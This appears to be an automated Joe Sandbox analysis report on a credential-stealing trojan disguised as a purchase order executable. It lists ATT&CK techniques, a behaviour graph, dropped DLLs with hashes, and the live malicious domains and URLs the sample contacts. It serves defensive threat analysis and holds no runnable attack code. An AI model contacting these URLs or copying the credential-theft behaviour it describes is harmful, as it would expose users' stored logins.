                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: Yara matchFile source: 5.2.PO No. 3200005919.exe.1de7883c.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.PO No. 3200005919.exe.1de22afc.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.PO No. 3200005919.exe.1de27450.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO No. 3200005919.exe PID: 5920, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation1
                    DLL Side-Loading
                    1
                    Access Token Manipulation
                    11
                    Masquerading
                    2
                    OS Credential Dumping
                    121
                    Security Software Discovery
                    Remote Services1
                    Email Collection
                    Exfiltration Over Other Network Medium1
                    Encrypted Channel
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                    System Shutdown/Reboot
                    Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
                    Process Injection
                    11
                    Virtualization/Sandbox Evasion
                    2
                    Credentials in Registry
                    11
                    Virtualization/Sandbox Evasion
                    Remote Desktop Protocol1
                    Archive Collected Data
                    Exfiltration Over Bluetooth1
                    Ingress Tool Transfer
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)1
                    DLL Side-Loading
                    1
                    Access Token Manipulation
                    1
                    Credentials In Files
                    1
                    Process Discovery
                    SMB/Windows Admin Shares4
                    Data from Local System
                    Automated Exfiltration3
                    Non-Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
                    Process Injection
                    NTDS3
                    File and Directory Discovery
                    Distributed Component Object Model1
                    Clipboard Data
                    Scheduled Transfer13
                    Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Obfuscated Files or Information
                    LSA Secrets26
                    System Information Discovery
                    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Timestomp
                    Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    DLL Side-Loading
                    DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                    File Deletion
                    Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 755357 Sample: PO No. 3200005919.exe Startdate: 28/11/2022 Architecture: WINDOWS Score: 100 38 dbxo2.shop 2->38 40 montevivo.es 2->40 46 Snort IDS alert for network traffic 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 4 other signatures 2->52 9 PO No. 3200005919.exe 2 42 2->9         started        signatures3 process4 file5 24 C:\Users\user\Overfurnished\...\qipcap.dll, PE32 9->24 dropped 26 C:\Users\user\Overfurnished\...\WMIMethod.dll, PE32+ 9->26 dropped 28 C:\Users\user\AppData\Local\...\System.dll, PE32 9->28 dropped 54 Tries to detect Any.run 9->54 13 PO No. 3200005919.exe 63 9->13         started        signatures6 process7 dnsIp8 42 dbxo2.shop 104.21.2.6, 49830, 49832, 80 CLOUDFLARENETUS United States 13->42 44 montevivo.es 86.109.170.4, 49829, 80 ABANSYS_AND_HOSTYTEC-ASCCharlesRobertDarwin11ES Spain 13->44 30 C:\Users\user\AppData\...\vcruntime140.dll, PE32 13->30 dropped 32 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32 13->32 dropped 34 C:\Users\user\AppData\Local\...\softokn3.dll, PE32 13->34 dropped 36 45 other files (none is malicious) 13->36 dropped 56 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->56 58 Tries to steal Instant Messenger accounts or passwords 13->58 60 Tries to steal Mail credentials (via file / registry access) 13->60 62 6 other signatures 13->62 18 cmd.exe 1 13->18         started        file9 signatures10 process11 process12 20 conhost.exe 18->20         started        22 timeout.exe 1 18->22         started       

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    PO No. 3200005919.exe62%ReversingLabsWin32.Trojan.Leonem
                    PO No. 3200005919.exe47%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-multibyte-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-private-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\freebl3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\mozglue.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\msvcp140.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\nss3.dll4%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\nssdbm3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\softokn3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\ucrtbase.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\vcruntime140.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\nsh409.tmp\System.dll0%ReversingLabs
                    C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous\WMIMethod.dll0%ReversingLabs
                    C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous\qipcap.dll0%ReversingLabs
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    montevivo.es0%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    https://mozilla.org00%Avira URL Cloudsafe
                    http://montevivo.es/lPkFJXszrxOMoP0.hhp0%Avira URL Cloudsafe
                    http://dbxo2.shop/dbx2/index.php0%Avira URL Cloudsafe
                    http://ocsp.thawte.com00%Avira URL Cloudsafe
                    http://dbxo2.shop/dbx2/index.php?0%Avira URL Cloudsafe
                    http://www.mozilla.com00%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    montevivo.es
                    86.109.170.4
                    truefalseunknown
                    dbxo2.shop
                    104.21.2.6
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://montevivo.es/lPkFJXszrxOMoP0.hhpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://dbxo2.shop/dbx2/index.phptrue
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.mozilla.com/en-US/blocklist/mozglue.dll.5.drfalse
                        high
                        http://nsis.sf.net/NSIS_ErrorErrorPO No. 3200005919.exefalse
                          high
                          http://crl.thawte.com/ThawteTimestampingCA.crl0PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpfalse
                            high
                            http://dbxo2.shop/dbx2/index.php?PO No. 3200005919.exe, 00000005.00000002.7238816533.00000000017A9000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://mozilla.org0PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://ocsp.thawte.com0PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.mozilla.com0PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            86.109.170.4
                            montevivo.esSpain
                            196713ABANSYS_AND_HOSTYTEC-ASCCharlesRobertDarwin11ESfalse
                            104.21.2.6
                            dbxo2.shopUnited States
                            13335CLOUDFLARENETUStrue
                            Joe Sandbox Version:36.0.0 Rainbow Opal
                            Analysis ID:755357
                            Start date and time:2022-11-28 16:34:15 +01:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 7m 33s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:PO No. 3200005919.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                            Run name:Suspected Instruction Hammering
                            Number of analysed new started processes analysed:9
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.phis.troj.spyw.evad.winEXE@8/56@2/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 8.9% (good quality ratio 8.6%)
                            • Quality average: 88.1%
                            • Quality standard deviation: 22.6%
                            HCA Information:
                            • Successful, ratio: 94%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                            • Stop behavior analysis, all processes terminated
                            • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe
                            • TCP Packets have been reduced to 100
                            • Excluded IPs from analysis (whitelisted): 40.126.31.73, 20.190.159.2, 20.190.159.71, 20.190.159.75, 40.126.31.71, 20.190.159.0, 20.190.159.68, 20.190.159.4
                            • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, prda.aadg.msidentity.com, login.live.com, login.msa.msidentity.com, www.tm.a.prd.aadg.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            No simulations
                            No context
                            No context
                            No context
                            No context
                            No context
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 22, 1st free page 7, free pages 2, cookie 0x10, schema 4, UTF-8, version-valid-for 3
                            Category:dropped
                            Size (bytes):45056
                            Entropy (8bit):0.7853305971874845
                            Encrypted:false
                            SSDEEP:48:43b/DVIIgyZKLk8s8LKvUf9K4UKTgyJqhtcebVEq8Ma0D0HOlcjlGxdKmtAONu41:Sb+uKLyeym/grcebn8MouOjlGxdKmt3N
                            MD5:00C036C61F625BF9D25362B9BE24ADEB
                            SHA1:6738C3D037E4A2E9F41B1398BA88E5771532F593
                            SHA-256:0C187B091E99E5BB665C59F8F8E027D5658904B32E4196D2EB402F3B1CAD69EF
                            SHA-512:711265BC8C1653BF6E862343BF3149A2AB09F4BA7D38E2D8A437001DB6C0F1936F6362571DD577CD7BDBEEC766DF141CB7E0681512C12E25A99CDB71731232D1
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):18744
                            Entropy (8bit):7.080160932980843
                            Encrypted:false
                            SSDEEP:192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
                            MD5:502263C56F931DF8440D7FD2FA7B7C00
                            SHA1:523A3D7C3F4491E67FC710575D8E23314DB2C1A2
                            SHA-256:94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
                            SHA-512:633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Reputation:high, very likely benign file
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....."............!......................... ...............................0.......J....@.............................+............ ..................8=..............T............................................................................text...+........................... ..`.rsrc........ ......................@..@......".........;...T...T.........".........d.................".....................RSDSMB...5.G.8.'.d.....api-ms-win-core-console-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......+....edata... ..`....rsrc$01....` .......rsrc$02......................".....................(...`...............,...W...................G...o...............................D...s...............5...b...............................................api-ms-win-core-console-l1-1-0.dll.AllocConsole.kern
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):18232
                            Entropy (8bit):7.093995452106596
                            Encrypted:false
                            SSDEEP:192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
                            MD5:CB978304B79EF53962408C611DFB20F5
                            SHA1:ECA42F7754FB0017E86D50D507674981F80BC0B9
                            SHA-256:90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
                            SHA-512:369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...A..............!......................... ...............................0.......#....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....A...........<...T...T.......A...........d...............A.......................RSDS...W,X.l..o....4....api-ms-win-core-datetime-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02....................A.......P...............(...8...H...................t.......................api-ms-win-core-datetime-l1-1-0.dll.GetDateFormatA.kernel32.GetDateFormatA.GetDateFormatW.kernel32.GetDateFormatW.GetTimeFormatA.kernel32.GetTimeFormatA
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):18232
                            Entropy (8bit):7.1028816880814265
                            Encrypted:false
                            SSDEEP:384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
                            MD5:88FF191FD8648099592ED28EE6C442A5
                            SHA1:6A4F818B53606A5602C609EC343974C2103BC9CC
                            SHA-256:C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
                            SHA-512:942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......GF....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@................9...T...T...................d.......................................RSDS.j..v..C...B..h....api-ms-win-core-debug-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................P...............(...8...H...|...............q.......................api-ms-win-core-debug-l1-1-0.dll.DebugBreak.kernel32.DebugBreak.IsDebuggerPresent.kernel32.IsDebuggerPresent.OutputDebugStringA.kernel32.OutputDebugStri
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):18232
                            Entropy (8bit):7.126358371711227
                            Encrypted:false
                            SSDEEP:192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
                            MD5:6D778E83F74A4C7FE4C077DC279F6867
                            SHA1:F5D9CF848F79A57F690DA9841C209B4837C2E6C3
                            SHA-256:A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
